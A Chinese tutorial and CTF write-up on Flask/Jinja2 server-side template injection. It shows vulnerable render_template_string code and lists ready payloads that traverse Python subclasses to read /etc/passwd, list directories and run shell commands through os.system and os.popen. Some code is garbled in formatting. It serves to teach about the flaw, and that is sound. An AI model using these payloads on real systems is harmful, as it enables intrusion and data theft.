python利用什么写模板_Python-模板注入

最新推荐文章于 2023-09-11 23:01:30 发布
最新推荐文章于 2023-09-11 23:01:30 发布
阅读量88 收藏
点赞数
文章标签: python利用什么写模板

何为模板注入?

模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码的分离,这大大提升了开发效率,良好的设计也使得代码重用变得更加容易。

但是模板引擎也拓宽了我们的攻击面。注入到模板中的代码可能会引发RCE或者XSS。

1790307-20200420215353634-758178029.png

flask基础

在学习SSTI之前,先把flask的运作流程搞明白。这样有利用更快速的理解原理。

路由

先看一段代码

from flask import flask

@app.route('/index/')

def hello_word():

return 'hello word'

route装饰器的作用是将函数与url绑定起来。例子中的代码的作用就是当你访问

渲染方法

flask的渲染方法有render_template和render_template_string两种。

render_template()是用来渲染一个指定的文件的。使用如下

return render_template('index.html')

render_template_string则是用来渲染一个字符串的。SSTI与这个方法密不可分。

使用方法如下

html = '

This is index page

'

return render_template_string(html)

模板

flask是使用Jinja2来作为渲染引擎的。看例子

在网站的根目录下新建templates文件夹,这里是用来存放html文件。也就是模板文件。

test.py

from flask import Flask,url_for,redirect,render_template,render_template_string

@app.route('/index/')

def user_login():

return render_template('index.html')

/templates/index.html

This is index page

访问127.0.0.1:5000/index/的时候,flask就会渲染出index.html的页面。

模板文件并不是单纯的html代码,而是夹杂着模板的语法,因为页面不可能都是一个样子的,有一些地方是会变化的。比如说显示用户名的地方,这个时候就需要使用模板支持的语法,来传参。

例子

test.py

from flask import Flask,url_for,redirect,render_template,render_template_string

@app.route('/index/')

def user_login():

return render_template('index.html',content='This is index page.')

/templates/index.html

{{content}}

这个时候页面仍然输出This is index page。

{{}}在Jinja2中作为变量包裹标识符。

模板注入

不正确的使用flask中的render_template_string方法会引发SSTI。那么是什么不正确的代码呢?

xss利用

存在漏洞的代码

@app.route('/test/')

def test():

code = request.args.get('id')

html = '''

%s

'''%(code)

return render_template_string(html)

这段代码存在漏洞的原因是数据和代码的混淆。代码中的code是用户可控的,会和html拼接后直接带入渲染。

尝试构造code为一串js代码。

1790307-20200420221935578-1698057910.png

将代码改为如下

@app.route('/test/')

def test():

code = request.args.get('id')

return render_template_string('

{{ code }}

',code=code)

继续尝试

1790307-20200420222002238-255847106.png

可以看到,js代码被原样输出了。这是因为模板引擎一般都默认对渲染的变量值进行编码转义,这样就不会存在xss了。在这段代码中用户所控的是code变量,而不是模板内容。存在漏洞的代码中,模板内容直接受用户控制的。

模板注入

不正确的使用flask中的render_template_string方法会引发SSTI。那么是什么不正确的代码呢?

目录:

(4)

(8)

(9)参考(挖坑)

(10)补充

其它模板注入payload

目录:

Flask模板注入

解析:

众所周知ssti要被{{}}包括。接下来的代码均要包括在ssti中。

1.几种常用于ssti的魔术方法

__class__ 返回类型所属的对象

__mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。

__base__ 返回该对象所继承的基类

// __base__和__mro__都是用来寻找基类的

__subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表

__init__ 类的初始化方法

__globals__ 对包含函数全局变量的字典的引用

__builtins__ builtins即是引用,Python程序一旦启动,它就会在程序员所写的代码没有运行之前就已经被加载到内存中了,而对于builtins却不用导入,它在任何模块都直接可见,所以可以直接调用引用的模块

2.获取基类的几种方法

[].__class__.__base__''.__class__.__mro__[2]

().__class__.__base__

{}.__class__.__base__

request.__class__.__mro__[8]   //针对jinjia2/flask为[9]适用

或者

[].__class__.__bases__[0] //其他的类似

3.获取基本类的子类

>>>[].__class__.__base__.__subclasses__()

[, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ]

ssti的主要目的就是从这么多的子类中找出可以利用的类(一般是指读写文件的类)加以利用。

那么我们可以利用的类有哪些呢?

4.利用

我们可以利用的方法有等。(甚至file一般是第40号)

>>> ().__class__.__base__.__subclasses__()[40]('/etc/passwd').read()

1790307-20200420215710589-701252824.png

可以从上面的例子中看到我们用file读取了 /etc/passwd ,但是如果想要读取目录怎么办?

那么我们可以寻找万能的os模块。

写脚本遍历。

#!/usr/bin/env python

# encoding: utf-8num= 0

for item in ''.__class__.__mro__[2].__subclasses__():try:if 'os' initem.__init__.__globals__:

print num,item

num+=1except:

print'-'num+=1

1790307-20200420215748524-902068196.png

直接调用就好了。可以直接调用system函数,有了shell其他的问题不就解决了吗?

>>> ().__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].system('ls')

5.读写文件

当然,某些情况下system函数会被过滤。这时候也可以采用os模块的listdir函数来读取目录。(可以配合file来实现任意文件读取)

>>> ().__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.') #读取本级目录

另外在某些不得已的情况下可以使用以下方式来读取文件。(没见过这种情况)。

方法一:

>>> ''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['file']('/etc/passwd').read()    #把 read() 改为 write() 就是写文件

方法二:

存在的子模块可以通过 .index()方式来查询

>>> ''.__class__.__mro__[2].__subclasses__().index(file)40

用file模块来查询。

>>> [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read()

这里拿 xctf 中的 Web_python_template_injection 做例子

进入题目界面可以看到

1800964-20200214190949025-2074445868.png

尝试模板注入 {{7*7}}

/49的存在说明7*7这条指令被忠实地执行了。接下来,开始想办法编代码拿到服务器的控制台权限 首先,题目告诉我们这是一个python注入问题,那么脚本肯定也是python的,思考怎样用python语句获取控制台权限:想到了os.system和os.popen([参考资料](https://blog.csdn.net/sxingming/article/details/52071514)),这两句前者返回**退出状态码**,后者**以file形式**返回**输出内容**,我们想要的是内容,所所以选择os.popen`

1800964-20200214191036173-145651654.png

知道了要用这一句,那么我要怎么找到这一句呢?python给我们提供了完整的寻找链(参考资料)

class:返回对象所属的类

mro:返回一个类所继承的基类元组,方法在解析时按照元组的顺序解析。

base:返回该类所继承的基类 //base__和__mro__都是用来寻找基类的__subclasses:每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表

init:类的初始化方法

globals:对包含函数全局变量的字典的引用

首先,找到当前变量所在的类:

有回显。尝试模板注入。

构造payload: ?{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

1800964-20200214191544931-964120281.png

读目录发现了fl4g。直接用file读取。构造payload: ?{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}}

1800964-20200214191749703-352986069.png

拿到了flag。

##注意事项:

''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('catfl4g').read()

''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].system('ls')

''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()

以上payload是非常常用的payload

文章引用:

https://blog.csdn.net/qq_45449318/article/details/105302194

https://www.freebuf.com/column/187845.html

https://www.cnblogs.com/cioi/p/12308518.html#a1

weixin_39724287
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python-模板注入
m0_51428325的博客
12-26 1812
何为模板注入模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码的分离,哲大大提升了开发效率,良好的设计也是的代码重用变得更加容易。 到那时模板引擎也拓宽了我们的攻击面,注入模板中的代码可能会引发RCE或者XSS flask基础 在学习SSTI之前,先把flask的运作流程搞明白,这样有于更加快速的理解原理 路由 先看一段代码 from flask import flask @app.route('/index/') def hello_word(): .
Python 模板引擎的注入问题分析
09-21
Python 模板引擎的注入问题源自于不安全的模板渲染机制,这允许恶意用户通过输入特殊格式的...通过实施严格的输入验证、使用安全的编程实践以及保持对最新安全威胁的了解,可以有效地降低Python模板引擎注入的风险。
Python模板注入(SSTI)
最新发布
sleepywin的博客
09-11 731
模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码分离。即也拓宽了攻击面,注入模板中的代码可能会引发RCE或XSS。攻击者可模板注入漏洞执行任意的python代码,包括读取敏感文件、执行系统命令、访问数据库等。通常会通过在用户输入中插入。模板注入漏洞可能导致攻击者能够执行恶意代码或访问未授权的数据。在python中,常见的模板引擎包括。Jinja2中使用{{...}}或{%...%},使得攻击者能够在模板中插入恶意代码。未正确过滤或转义用户提供的输入时。使用模板引擎解析用户提供的输入。
python模板注入_SSTI模板注入
weixin_35186171的博客
02-10 805
SSTI是个啥?SSTI即(server-side template injection)服务器模板,平时我们常用的有sql注入,xss注入,xml注入和命令注入等等。大家应该都知道sql注入的原理以及方式,而模板注入的原理也很类似都是通过输入一些指令在后端处理进行了语句的拼接然后执行。模板注入不同的是它是针对python、php、java、nodejs、javascript或是ruby的网站处理...
python用什么模板_用python模板引擎
weixin_39775577的博客
11-20 125
一.实现思路本文讲解如何使用python实现一个简单的模板引擎, 支持传入变量, 使用if判断和for循环语句, 最终能达到下面这样的效果:渲染前的文本:{{title}}十以内的奇数:{% for i in range(10) %}{% if i%2==1 %}{{i}}{% end %}{% end %}渲染后的文本,假设title="高等数学":高等数学十以内的奇数:13579要实现这样的效...
Python设计模式之模板方法模式实例详解
采菊东篱下,Python满乾坤!
08-03 756
1、模板方法模式定义 定义一个操作中的算法的框架,而将一些步骤延迟到子类中,使得子类可以不改变一个算法的结构即可重新定义该算法的某些特定的步骤。 子类实现的具体方法叫作基本方法,实现对基本方法高度的框架方法,叫作模板方法。 2、模板方法模式的优点 可变的部分可以充分扩展,不变的步骤可以充分封装; 提取公共代码,减少冗余代码,便于维护; 具体过程可以定制,总体流程方便掌控。 使用模板方法可以将代码的复用最大化。 子类只需要实现自己的方法,将算法和实现的耦合降低。 3、模板方法模式的使用场景
Python库 | django_file_form-0.4.1-py3-none-any.whl
03-18
**Python库 django_file_form-0.4.1-py3-none-any.whl** 这个压缩包包含的是一个Python库,名为`django_file_form`,版本号为0.4.1,适用于Python 3环境。该库专门针对Django框架设计,用于简化在Django后端处理...
Python库 | pyams_pagelet-1.2.0-py3.7.egg
02-21
**Python库pyams_pagelet-1.2.0-py3.7.egg详解** `pyams_pagelet` 是一个Python开发的库,主要用于构建Web应用程序的页面组件,特别是那些基于Zope应用服务器的项目。它提供了一种灵活且可扩展的方式来组织和管理...
Python库 | pyams_viewlet-1.2.1-py3-none-any.whl
03-23
`pyams_viewlet`用了模板引擎,如Jinja2,来渲染视图小部件。开发者可以使用模板语言编动态HTML,实现复杂的界面布局和逻辑,同时保持代码的清晰性和可维护性。 5. **插件系统** `pyams_viewlet`支持插件机制...
Python库 | Flask_Injector-0.11.0-py2.py3-none-any.whl
02-16
**Flask_Injector-0.11.0-py2.py3-none-any.whl** 是一个针对Python开发的库,特别设计用于集成到基于 **Flask** 的Web应用中的依赖注入框架。依赖注入(Dependency Injection)是一种软件设计模式,它有助于简化...
python读取Excel中的数据,然后进word
04-25
代码用于读Excel中的数据,然后批量进word,文件的读有专门的类,对于批量处理excel很有帮助
python自定义动态模板
weixin_52224421的博客
12-15 211
python自定义动态模板
python模板模式_模板模式-Python
weixin_39636717的博客
11-29 118
这篇文章完全摘录自别人,等后续,基于自己在项目中的应用,再重新一下。模板方法模式(Template Method Pattern):定义一个操作中的算法骨架,将一些步骤延迟至子类中.模板方法使得子类可以不改变一个算法的结构即可重定义该算法的某些特定步骤。demo下面是一个模板方法模式的一个demo:#!/usr/bin/env python# -*- coding:utf-8 -*-__auth...
python自动生成verilog模块例化模板
weixin_30249203的博客
08-10 2850
一、前言   初入职场,一直忙着熟悉工作,就没什么时间更新博客。今天受“奇马”的影响,只好宅在家中,技术文章。芯片设计规模日益庞大,编脚本成了芯片开发人员必要的软技能。模块端口动不动就几十上百个,手动编代码伤不起。实现verilog模块例化模板的自动生成也算是我自砸饭碗的第一步了O(∩_∩)O! 二、代码设计   要自动生成模块例化模板总共分三步:1 打开设计文件,读取内...
python模板注入_python SSTI tornado render模板注入
weixin_34942265的博客
02-04 768
原理tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}}进行传递变量和执行简单的表达式。简单的理解例子如下:-----------------------------------------------------------------------------...
python用什么模板_分享一个小demo用的python模板
weixin_39920629的博客
11-20 90
#!/usr/bin/env python# -*- coding: utf-8 -*-"""Python Demo Template.notes:- log file will be created in CWDtips:- itertools and operator may simplify sort and iterate- sqlite3 may be helpful for your...
python用什么来模块-Python模块的制作方法实例分析
weixin_39870238的博客
11-11 532
本文实例讲述了Python模块的制作方法。分享给大家供大家参考,具体如下:1 目的用setup.py将框架安装到python环境中,作为第三方模块来调用,2 第一步:完成setup.py的编以下代码相当于一个模板,只用更改name字段出,改为对应的需要安装的模块名称就可以,比如这里是:py_plus将setup.py文件放到py_plus的同级目录下from os.path import di...
python用什么模板_Python用逻辑回归分类实现模板
weixin_39741101的博客
11-20 67
Logistic Regression Classifier逻辑回归主要思想就是用最大似然概率方法构建出方程,为最大化方程,用牛顿梯度上升求解方程参数。优点:计算代价不高,易于理解和实现。缺点:容易欠拟合,分类精度可能不高。使用数据类型:数值型和标称型数据。好了,下面开始正文。算法的思路我就不说了,我就提供一个万能模板,适用于任何纬度数据集。虽然代码类似于梯度下降,但他是个分类算法定义sigmo...
python用什么书模块_python-常用模块
weixin_39764603的博客
12-09 286
什么是模块:模块实质上就是一个python文件,它是用来组织代码的,意思就是说把python代码到里面,文件名就是模块的名称,test.py:test就是模块名称。一、os模块:对操作系统的一些操作import os #对操作系统一些操作print(os.getcwd()) #获取当前工作目录os.chmod('h.py',2) #给文件加目录,对windons不好使,只对Linux有...
web python template injection_攻防世界-Web_python_template_injection详解
05-26
然而,如果在模板引擎中直接使用用户输入作为变量或表达式的一部分,而没有对用户输入进行适当的验证和过滤,就可能导致模板注入漏洞。 例如,在 Flask 应用程序中,可以使用 Jinja2 模板引擎来生成动态内容。如果...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值